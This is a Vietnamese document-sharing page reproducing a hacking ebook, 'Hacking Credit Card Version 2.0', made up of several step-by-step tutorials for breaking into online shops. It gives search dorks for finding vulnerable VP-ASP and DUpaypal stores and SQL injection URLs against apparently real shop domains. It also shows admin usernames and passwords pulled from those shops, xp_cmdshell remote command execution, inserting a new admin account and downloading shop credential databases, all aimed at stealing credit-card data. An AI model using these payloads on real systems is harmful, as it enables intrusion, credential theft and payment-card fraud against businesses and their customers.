Hacking Credit Card Version 2.0

Chia sẻ: A Ly | Ngày: | Loại File: PDF | Số trang:66

0
151
lượt xem
81
download

Hacking Credit Card Version 2.0

Mô tả tài liệu
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Cách này cũng như những cách thông thường là khai báo theo lỗi SQL và cũng có thể áp dụng cho một số lỗi khác như: OLE DB, JET Database, ASP .. . . .Năm 1978, việc thử nghiệm phương pháp được khởi đầu tại một cơ sở thử nghiệm của khách hàng. Cuộc thử nghiệm đã chứng minh được sự có ích và tính thực tiễn của hệ thống và đã chứng tỏ sự thành công của IBM.

Chủ đề:
Lưu

Nội dung Text: Hacking Credit Card Version 2.0

 1. Hacking Credit Card Version 2.0
 2. Ebook naøy ñöôïc vieát ra nhaèm muïc ñích laø hoïc hoûi vaø chia seõ kieán thöùc. Email: hieuitpc@yahoo.com Homepage: http://cntt.pro.vn Noäi dung cuûa ebook: hai tutorials do hieupc vieát vaø moät vaøi tutorials khaùc do anh em baèng höõu vieát, trong ñoù coù moät vaøi tutorials cuõ nhöng cuõng raát ñaùng ñöôïc ñöa vaøo vôùi muïc ñích ñeå tham khaûo.
 3. Hacking Credit Card Version 2.0 --- Written by Hieupc shopdisplayproducts.asp?cat=' Sau một thời gian dài TTD bị chia cắt đến nay, hieupc mới bắt đầu viết 1 tutorial về hack credit card mới và có lẽ đây là tutorial cuối cùng đầy đủ nhất,được hieupc biên soạn và sưu tầm từ nhiều tutorial cũ đến mới vào 1 cái ebook và trả lời những câu hỏi thắc mắc của các bạn và hieupc cũng ðã làm 1 bản Ebook hacking credit card. Nào giờ chúng ta bắt ðầu bắt ðầu nhé. Cách này cũng nhý những cách thông thường là khai thác theo l ỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác như: OLE DB, JET Database, ASP… Býớc 1: Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good. Từ khoá nên dùng: allinurl:”shopdisplayproducts.asp?id= hoặc allinurl:”shopdisplayproducts.asp?cat=1 hoặc allinurl:”shopdisplayproducts.asp?cat=2…… Search shop theo Domain .com, .net , .biz…..: allinurl:”.com/shopdisplayproducts.asp?cat=,allinurl:”.net/shopdisplayproducts.asp?cat=... Ai biết chấm gì nữa thì thay vào :) Khả năng lấy được credit card: là 99.9 % còn 0.1 % còn lại phụ thuộc vào cái đầu của bạn. Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt ðầu hack. Býớc 2: Ví dụ: lấy ví dụ là 1 site thế có dạng thế này : http://www.victim.com http://www.victim.com/shopdisplayproducts.asp?id=5 Ta sẽ thêm dấu phẩy ( ` ) vào sau số 5: http://www.victim.com/shopdisplayproducts.asp?id=5' Xem nó có bị lỗi không nào, hic nó không bị lỗi, chỉ thấy thế này: Home Improvement Page 1 of 2
 4. Không sao, chúng ta hãy bình tĩnh nhé, thay “ id “ bằng “ cat “ thử xem: http://www.victim.com/shopdisplayproducts.asp?id=5' -->>> http://www.victim.com/shopdisplayproducts.asp?cat=5' Uh, nó lỗi ruì kìa: 5' Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c. catdescription like '5'%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 467 Okie, tiếp tục nhé, bạn sẽ thêm ðoạn code sau ðây vào: '%20union%20%20select%201%20from%20tbluser"having%201=1--sp_password http://www.victim.com/shopdisplayproducts.asp?id=5' Khi thêm xong thì sẽ nhý thế này: http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201%20from%20tbluser"having% 201=1--sp_password và ðýợc thế? này : 5' union select 1 from tbluser"having 1=1--sp_password Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 467 Chú ý nhé các bạn, cái dấu phẩy ( ` ) rất quan trọng, không có là không được. Và cứ thế ta cứ tiếp tục thêm số nhé: http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2%20from%20tbluser"having% 201=1--sp_password
 5. http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2,3%20from%20tbluser"having %201=1--sp_password http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2,3,4%20from% 20tbluser"having%201=1--sp_password Cứ thế mà tiếp tục cho ðến khi bạn thấy 1 cái bảng đẹp đẹp hiện ra với vài con số. Ở ðây là tới số 47 : http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having %201=1--sp_password 3 click to see more 4 22 18 Please review these other products: Nào giờ chúng ta bắt đầu lấy user and pass: · fldusername : thay cho số 3 , hay 4, hay 22 tu bạn ỳ · fldpassword : thay cho số 3 , hay 4, hay 22 tu bạn ỳ Sau khi thêm xong ta sẽ được nhý thế này: http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having %201=1--sp_password Và có được username và password : User: stephenrossi pass: gnilsur Hoặc bạn có thể gộp chung fldusername và fldpassword vào 1 số cũng được. http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,fldusername%2b'/'% 2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1--sp_password Ta sẽ có user và pass được gộp chung 1 số: stephenrossi/gnilsur
 6. Bước 3: Tìm link admin, thử đánh cái này vào được không nào: http://www.victim.com/shopadmin.asp hic không được rồi. Thử cái này nữa thử xem, may ra nó chạy đến link admin thì sao: http://www.victim.com/shopadmin1.asp , cũng không được. Cái này hieupc đã download cái source của VPASP về xem cấu trúc nó thế nào, và đã tìm ra cậu lệnh thế này, chẳng qua là thay table thôi. Ta biết table configuration là nơi chứa những thông quan trọng của shop như là link admin, afftemplateaffiliate, afftemplateMerchant….. Vậy cậu lệnh sẽ thế này: '%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Thay vào ta sẽ được: http://www.valuevision.com.ph/shopdisplayproducts.asp?cat='%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Ta cũng thấy cái bảng: 3 click to see more 4 22 18 Please review these other products: Lần này thì ta sẽ kiếm link admin, thường thì link admin nằm trong fieldvalue , vì thế ta sẽ đặt fieldvalue vào s ố 3, hay 4, hay 22 tuỳ các bạn. '%20union%20%20select%201,2,3, fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Sau khi thêm xong ta sẽ được thế này: http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
 7. Các bạn sẽ chẳng thấy link admin ở đâu hết toàn là mấy con số, lúc đầu hieupc cũng tưởng là mình làm sai cậu lệnh, nhưng loay hoay 1 đỗi , kéo trang lên, kéo trang xuống, à thì ra có tới 10 trang. Page 1 of 10 Chỉ cần để ý là các bạn thấy thôi, nói thêm là: mỗi một trang như vậy là chứa những thông tin có trong fieldvalue , các bạn cứ cố gắng view từng trang nhé, hieupc view hết 10 trang và thu thập được những link có đuôi là *.asp: shopaddmoretocart.asp shopcheckout.asp shopdisplaycategories.asp Nhất định 1 trong 3 link này là link admin login , hieupc đã thử hết 3 link và cái link đầu tiên là link admin shopaddmoretocart.asp http://www.victim.com/shopaddmoretocart.asp This site is reserved for Shop Administrators only. Administrator's Login UserName : Password : Bây giờ lấy username và password ở trên để thay vào. Việc còn lại chắc các bạn biết. Image Field THE END
 8. Hacking Credit Card Version 1.0 --- Written by Hieupc Hack Shop VPASP thật sự là như thế nào? ( Cập nhật và được phát triển thêm từ nhiều bài viết hướng dẫn trước đây ) CÁCH THỨ 1: Cái này chắc có lẽ cũng có nhiều bạn biết, nếu mình đoán không lầm thě chỉ có 30 %-50 % member là biết cách này, tuy nhiên mình cũng đưa lên đây cho các bạn chýa biết và các bạn đă biết rùi học hỏi thêm ở mình hoặc góp ý thêm cho mình chỗ nào chưa hoàn chỉnh ! Cách này cũng như những cách thông th ường là khai thác theo l ỗi SQL và cũng có thể áp dụng cho 1 s ố lỗi khác như OLE DB, JET Database, ASP… Bước 1: Ðể tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và search shop nh ư thế nào cho thật là hiệu quả. Bước này cũng là bước quan trọng nhất vì không có shop lỗi làm sao hack :)) Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good. Từ khoá nên dùng: allinurl:”shopdisplayproducts.asp?id= hoặc allinurl:”shopdisplayproducts.asp?id=1 hoặc allinurl:”shopdisplayproducts.asp?id=2…… Search shop theo Domain .com, .net , .biz…..: allinurl:”.com/shopdisplayproducts.asp?id= ; allinurl:”.net/shopdisplayproducts.asp?id=... Ai biết chấm gì nữa thì thay vào :) Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt ðầu hack. Bây giờ mình lấy ví dụ shop này nhé: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1 Oh, 1 em Uk cực ngon không biết có CC. Bây giờ kiểm tra xem nó lỗi không bằng cách thêm vào dấu phẩy ( ` ) http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1' Oh site bị lỗi kìa các bạn : Products Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order By specialOffer DESC, cname'. /chris/shop$db.asp, line 868 Bý?c 2: Ta bắt đầu thêm vào đoạn code này : %20union%20%20select%201%20from%20tbluser%27 Vào phía sau link shop nhớ bỏ luôn cái dấu phẩy sau ?id=1 nhé, nếu không là không được đâu đấy.
 9. Khi thêm xong link sẽ như thế này: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201%20from% 20tbluser%27 Oh không dụ gì đây :) Products Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match. /chris/shop$db.asp, line 868 Còn không biết qua bước 3 nữa, nhưng khoan các bạn hãy xem kinh nghiệm của mình đă khi thêm vào dấu phẩy ( ` ) mà nó hiện ra lỗi như vầy: Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ' '. /product.asp, line 29 Thì các bạn hack theo kiểu hack cũ nhé. Thui bây giờ qua bước 3 nhé, nói nhiều quá :)) Sau khi đă hoàn thành bước 2, bạn sẽ bắt đầu 1 công việc thiêng liêng nhất và cũng là mệt mỏi nhất, không mệt đâu chỉ uể oải 1 tí, đó là thêm số vào code: 1%20union%20%20select%201,2%20from%20tbluser%27 1%20union%20%20select%201,2,3%20from%20tbluser%27 1%20union%20%20select%201,2,3,4%20from%20tbluser%27……….. Khi thêm vào thì link sẽ như th�¿ này : http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2%20from% 20tbluser%27 http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3%20from% 20tbluser%27
 10. http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3,4%20from% 20tbluser%27 ………… Cứ thêm số tiếp tục nhé, đừng nản lòng hãy cố lên. Cho đến khi nó xuất hiện 1 cái bảng rất đẹp :)) Ái da, mỏi tay quá tới số 34 mới hiện ra cái bảng trời đánh này :)) http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%20from%20tbluser %27 Đây là bước cuối cùng để lấy user and pass: những con số quan trọng của shop naỳ là : 3, 4 , 22. fldusername
 11. Ví dụ site này: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153' cũng thêm vào dấu phẩy ( ` ) để check lỗi Products Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''. /shopping/shopdisplayproducts.asp, line 93 Oh có lỗi rồi, giờ sao đây :)) Cái này anh em biết khai thác chứ: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20table_name%20from%20information_schema.tables))--sp_password Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93 Bước 2 chắc các bạn biết, chỉ là lấy table thui, mình chỉ việc kiếm table nào chưá users của admin là okie. http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20 ('ver_Faq','coupons','customerprices','customers')))--sp_password Products Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminUsers' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93 Tới đây là đã quá rõ, cái mình chính là table này : 'AdminUsers' vì sao vậy vì nó chưá user và pass chắc. Thui cứ khai thác thử. Code: %20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns% 20where%20table_name=('AdminUsers')))--sp_password Khi thêm code xong sẽ như thế này: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')))-- sp_password Products Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminID' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
 12. Và bước tiếp theo: Code : %20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns% 20where%20table_name=('AdminUsers')%20and%20column_name%20not%20in%20('AdminID')))--sp_password Khi thêm code xong sẽ như thế này: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and %20column_name%20not%20in%20('AdminID')))--sp_password Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93 Và các bạn cứ tiếp tục thêm table vào: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and %20column_name%20not%20in%20('AdminID','login')))--sp_password http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and %20column_name%20not%20in%20('AdminID','login','pwd')))--sp_password Okie 2 thông tin quan trọng là 'login','pwd' đă xuất hiện giờ chỉ việc kiếm pass: Code: %20and%201=convert(int,(select%20top%201%20login%2b'/'%2bpwd%20from%20AdminUsers))-- sp_password ặc ặc shop củ khoai: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20login%2b'/'%2bpwd%20from%20AdminUsers))--sp_password Products Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin/admin' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93 Hic hic, user: admin , pass: admin ; đủ biết là shop này thằng admin nó ngu đến cỡ nào Bây giờ kiếm link admin là nhiệm vụ của bạn.
 13. TUTORIALS OF MY FRIENDS OR ORTHER AUTHORS Tutorial ñöôïc vieát bôûi kidbandes What you should look for? (Mục đích của việc tìm lỗi) Tìm ra các trang cho phép bạn nhạp dữ liệu, ví dụ là login page, search page, .... Thỉnh thoảng, HTML page sử dụng "Post" command để gởi thông số đến trang ASP khác. Vì vậy, bạn không thể thấy thông số trên thanh URL, và xem "FORM" tag trong HTML code. Bạn có thể tìm vài thứ như đoạn code sau: Mọi thứ giữa và có thông số lỗi được sử dụng. What if you can't find any page that takes input? Bạn làm gì nếu không tìm ðýợc trang nhập liệu nào ? Bạn nên tìm kiếm trang nhý ASP, JSP, CGI, hay PHP. C gắng tìm các URL vói các thông số sau: ố http://shopping.com/index.asp?id=10 How do you test if it is vulnerable? (Chúng ta kiểm tra lỗi như thế nào) Bắt đầu với 1 dấu nháy đơn, thêm vào như sau: hi' or 1=1-- Nhập vào login hoặc password, hoặc ngay cả URL. - login: hi' or 1=1-- - password: hi' or 1=1-- - http://shopping.com/index.asp?id=hi' or 1=1-- Nếu bạn làm như thế với 1 giá trị ẩn, phải download source HTML từ site, lưu vào đĩa cứng và chỉnh sửa URL và giá trị ẩn. Ví dụ: Nếu may mắn thì trên site của bạn, bạn sẽ lấy được đăng nhập nhng không co tên đãng nhập và mật mã Nhưng tại sao dùng 'or 1=1-- ? Chúng ta xem 1 ví dụ khác tại sao ' or 1=1-- lại quan trọng. Khác với việc vượt đăng nhập, nó có thể xem nhiều dữ liệu hơn là với các thông tin thông thường. Lấy 1 trang ASP bạn sẽ thấy cái link như sau: http://shopping.com/index.asp?category=food Trong URL, 'category' là 1 tên biến, và 'food' là giá trị gán cho biến ðó. Trong trường
 14. hợp ðó, 1 trang ASP có thể chứa các đoạn code sau (OK, đây là ðoạn code được viết ra cho bài viết này): v_cat = request("category") sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'" set rs=conn.execute(sqlstr Như chúng ta thấy, biến sẽ có giá trị v_cat bên trong và vì vậy câu lệnh SQL sẽ trở thành: SELECT * FROM product WHERE PCategory='food' Câu lệnh truy vấn trên sẽ đưa ra tất cả các giá trị với điều kiện là field PCategory là 'food'. Bây giờ câu truy vấn sẽ nhý thế này: http://shopping.com/index.asp?category=food' or 1=1-- Bây giờ, giá trị của v_cat sẽ là "food' or 1=1-- ", nếu chúng ta chuyển ðổi thành câu lệnh SQL, chúng ta sẽ có: SELECT * FROM product WHERE PCategory='food' or 1=1--' Câu truy vấn sẽ lọc ra các giá trị trong cột PCategory vói các giá trị là 'food'. Dấu "--" sẽ bỏ qua các truy vấn của MSSQL . Thỉnh thoảng chúng ta cũng có thể sử dụng dấu "#". Tuy nhiên, nếu hệ thống không co MSSQL hoặc chỉ đơn giản la truy vấn bình thường ta chỉ cần sử dụng or 'a'='a Câu lệnh SQL sẽ là : SELECT * FROM product WHERE PCategory='food' or 'a'='a' Phụ thuộc vào câu truy vấn, ta sử dụng các giá trị sau: ' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a
 15. How do I get remote execution with SQL injection? (Phương pháp để thực thi lệnh từ xa với SQL) Để có thể inject(nhập thêm) 1 lệnh SQL, chúng ta có thể thực hiện lệnh. Cài đặt mặc ðịnh trên MS SQL chạy dưới quyền SYSTEM, là user với quyền truy cập Aministrator. Chúng ta có thể sử dụng để lưu trữ master..xp_cmdshell thực hiện lệnh từ xa: '; exec master..xp_cmdshell 'ping 10.10.1.2'-- Thử dấu (") nếu dấu (') không làm việc. Hai dấu trừ ở cuối dòng lệnh cho phép thực hiện một lệnh SQL mới. Ðể kiểm tra rằng câu lệnh này thực hiện được, bạn có thể lắng nghe các gói tin ICMP từ 10.10.1.2, kiểm tra bất kỳ gói tin nào từ server: #tcpdump icmp Nếu bạn không nhận ðýợc bất kỳ gói tin từ server, và nhận 1 thông báo lỗi là không ðýợc quyền, thì có thể Administrator đã giới hạn quyền người dùng truy cập vào hệ thống. How to get output of my SQL query?(Phýõng pháp Lấy kết quả từ câu truy vẫn SQL) Nếu có thể, bạn sử dụng sp_makewebtask để viết câu truy vấn thành câu lệnh HTML: '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA. TABLES" Nhưng địa chỉ IP phải có thư mục được share cho tất cả mọi người How to get data from the database using ODBC error message (Phương pháp Lấy dữ liệu từ CSDL sử dụng lỗi ODBC) Chúng ta sử dụng thủ tục bị lỗi trong Server MS SQL để thực hiện lệnh. Xem ví dụ sau: http://shopping.com/index.asp?id=10 Chúng ta cố gắng kết hợp UNION trong '10' với 1 câu lệnh khác: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA. TABLES-- Bảng hệ thống INFORMATION_SCHEMA.TABLES chứa thông tin của tất cả các bảng trong hệ thống. TABLE_NAME field chứa tất cả các tên của bảng trong hệ thống. Nó luôn luôn tồn tại theo cách mặc định. Câu truy vấn sẽ là:
 16. SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- Ðiều này se trả về bảng đầu tiên trong bảng INFORMATION_SCHEMA_TABLES. Khi chúng ta UNION giá trị này với số nguyên 10, MS SQL Server sẽ cố gắng chuyển đổi giá trị chuỗi (nvarchar) thành 1 số nguyên. Thủ tục này bị lỗi, bởi vì không thể thục hiện chuyển đổi từ nvarchar thành int. Server sẽ xuất hiện lỗi sau: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int. /index.asp, line 5 Thông báo lỗi đủ để biết được là không thể chuyển ðổi giá trị chuỗi thành số. Trong trường hợp này, chúng ta có thể lấy được tên table đầu tiên là "table1". Để lấy table tiếp theo ta có thể sử dụng lệnh sau: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA. TABLES WHERE TABLE_NAME NOT IN ('table1')-- Chúng ta cũng có thể sử dụng nó bằng lệnh LIKE: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA. TABLES WHERE TABLE_NAME LIKE '%25login%25'-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int. /index.asp, line 5 Giá trị trong phù hợp, '%25login%25' sẽ được xem nhý là %login% trong SQL Server. Trong trường hợp này, ta có thể lấy tên đầu tiên trong table có giá trị phù hợp là, "admin_login". How to mine all column names of a table? (Cách lấy tất cả tên cột trong table) Chúng ta có thể sử dụng table khác INFORMATION_SCHEMA.COLUMNS để ánh xạ tất cả các cột của table: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
 17. [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int. /index.asp, line 5 Bây giờ chúng ta có cột đầu tiên trong table, chúng ta sử dụng NOT IN () để lấy cột tiếp theo: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int. /index.asp, line 5 Khi chúng ta tiếp tục có thể sẽ thu được một số cột cần thiết như là "password", "details". Chúng ta sẽ biết được nội dung khi sử dụng câu truy vấn sau: Quote: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')-- Output: Quote: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator. /index.asp, line 5 How to retrieve any data we want? (phương pháp lấy tất cả dữ liệu mình muốn) Bây giờ chúng ta sẽ xem xét 1 số table quan trọng, và các field của nó, Chúng ta cũng sử dụng cùng kỹ thuật trên ðể lấy dữ liệu cần thiết trong CSDL . Bây giờ chúng ta lấy giá trị đầu tiên trong cột login_name từ bảng "admin_login": http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
 18. Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'kidbandes' to a column of data type int. /index.asp, line 5 Tên của user admin là "kidbandes". Cuối cùng chúng ta lấy thêm password của "kidbandes" trong CSDL http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='kidbandes'-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'loverthu' to a column of data type int. /index.asp, line 5 bây giờ chúng ta có thể đãng nhập với tên "kidbandes" và password "lovethu". How to get numeric string value? (phương pháp lấy giá trị chuỗi s&#7889 Có 1 sự giới hạn trong kỹ thuật ở trên. Chúng ta không thể lấy được bất kỳ câu lệnh lỗi nào nếu chúng ta chuyển đổi kiểu chuỗi thành bất kỳ kiểu số nào (các ki tự 0-9). Chúng ta cố gắng lấy password của "kimthu" mà nó là số "123456": http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'-- Thông thường chúng ta sẽ nhập được thông báo là "Page Not Found". Nguyên nhân ở đây là password của "kimthu" là "123456" sẽ không thể chuyển đổi, trước UNION với 1 số (10 in this case). bới vì đây là 1 câu lệnh UNION đúng, SQL server sẽ không quãng lỗi ODBC, và vì vậy chúng ta sẽ không thể lấy được thông báo lỗi. Ðể giải quyết vấn đề này, Chúng ta có thể dùng một ki tu chuỗi để làm cho câu lệnh truy vấn lỗi. Chúng ta cố gắng thực hiện câu truy vấn sau: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20anhyeuem') FROM admin_login where login_name='trinity'-- Chúng ta sử dụng dấu (+) để kết hợp password với 1 giá trị chuỗi mà chúng ta muốn. (ASSCII code for '+' = 0x2b). Chúng ta sẽ kết hợp với '(space)morpheus' thành 1 password thực. Vì vậy, ngay cả với password là một chuỗi số '123456', Nó cũng sẽ trở thành '123456 anhyeuem' bằng cách ðõn giản gọi lệnh convert(), sau đó cố gắng chuyển đổi '123456 anhyeuem' thành 1 số, SQL Server sẽ xuất hiện lỗi ODBC:
 19. Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '123456 anhyeuem' to a column of data type int. /index.asp, line 5 How to update/insert data into the database? (phương pháp Update/Insert dữ liệu vào CSDL) Khi chúng ta thành công trong việc thu thập thông tin từ CSDL, ðiều này có nghĩa chúng ta có thể UPDATE hoặc ngay cả INSERT một record mới trong table. Ví dụ chúng ta có thể thay password của "kidbandes": http://shopping.com/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'lovethu' WHERE login_name='kidbandes'-- Để INSERT dữ liệu mới vào CSDL: http://shopping.com/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'kidbandes2','lovethu','NA')-- Bây giờ chúng ta có thể đăng nhập với "kidbandes2" và password "lovethu". date : 29/05/2005 TG kidbandes newbie of Thecorrs Family
 20. TUTORIAL FORM jonnyhackstuff Mức độ nguy hiểm : khá cao tỷ lệ thành công :80% Tool :+ site http://google.com.vn/ + PC của bạn cài Access ( dùng để xem file .mdb) Hiện các Shop DUpaypal rất nhiều và hàu như chưa fix được mấy bằng chứng là tấn công 10 site thì 8 site dính :D) Tiến hành: Lên http://google.com.vn/ Search với từ khóa "Powered by DUpaypal -siteduware.com" bạn sẻ thấy rất nhiều site dính Bug này, Chọn victim để test nào ở đây kieptinhchung chọn cái này: http://www.xcel-leadership.com/sermon/deta...ro=147&iType=18 bi giờ thêm vào sau Nó : ../_private/DUpaypal.mdb để Dowload file chứa thông tin về U/P của Admin về , tức là ta sẻ dùng link sau để dowload nó: http://www.xcel-leadership.com/sermon/_private/DUpaypal.mdb sau khi dowload về bạn sẻ xem Nó dưới dạng Accees, tìm phần User và lấy user+pass đăng nhập thật dễ dàng , như vậy là bạn đã làm chủ Shop đó roài đó. TUTORIAL BY HCEGROUP
Đồng bộ tài khoản